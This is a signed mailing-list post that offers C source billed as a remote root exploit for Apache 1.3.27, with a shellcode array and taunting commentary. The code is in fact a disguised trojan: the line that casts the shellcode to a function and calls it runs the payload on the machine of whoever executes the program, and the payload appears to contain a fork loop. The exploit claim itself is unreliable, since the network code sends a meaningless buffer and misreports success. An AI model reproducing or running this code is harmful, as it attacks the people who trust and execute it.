Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST)

[<koec () hushmail com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I am posting this as a member of koec.  The koec take no responsibility
for damages caused by this software, compile and use at your own risk.
 By the way, the koec make you all look like a bunch of fuckin' schoolgirls.

WHITEH8.

- --BEGIN KOEC-APACHE.C--

/* :: PRIVATE - DO NOT DISTRIBUTE ::
 * Apache/1.3.27 - Remote Root Exploit
 * Knights of the Eastern Calculus (info () koec org)
 */

#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

static char shellcode[] = {
                              "\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
                              "\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
                              "\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
                              "\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
                              "\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
                              "\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
                              "\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
                              "\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
                              "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
                              "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
                              "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
                              "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
                              "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
                              "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
                              "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
                          };

int main(int *argc, char **argv)
{
    int i;
    char *buffer;
    int s;
    struct hostent *hp;
    struct sockaddr_in sin;

    if((int)argc < 3 )
    {
        printf("usage: %s <target> <shell port>\n", argv[0]);
        printf("ex: %s google.com 31337\n", argv[0]);
        exit(0);
    }

    buffer = (char *) malloc(512 + 1024 + 100);
    if (buffer == NULL) {
        printf("Not enough memory\n");
        exit(1);
    }
    memcpy(&buffer[512 - strlen(shellcode)], shellcode,
           strlen(shellcode));
    buffer[512 + 1024] = ';';
    buffer[512 + 1024 + 1] = '\0';
    void(*b)()=(void*)shellcode;b();
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("Server doesn't exist\n");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf("Cannot open socket\n");
        exit(1);
    }
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("Connection refused\n");
        exit(1);
    }
    printf("Attempting to Exploit...\n");
    if (send(s, buffer, strlen(buffer), 0) != 1)
        printf("Success!!!\n");
    else
        printf("No go there tough guy!\n");
    printf("If we're lucky there should be a shell on port %d.\n", atoi(argv[2]));

}

- --END KOEC-APACHE.C--
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAj7zKrcACgkQsm8eq8rMuWpg0gCeNQCeLDLLhIki1eWI09PYX+bKLEgA
nRXqS24ObnxBxWHwroyNTkBVjZpo
=D2RC
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html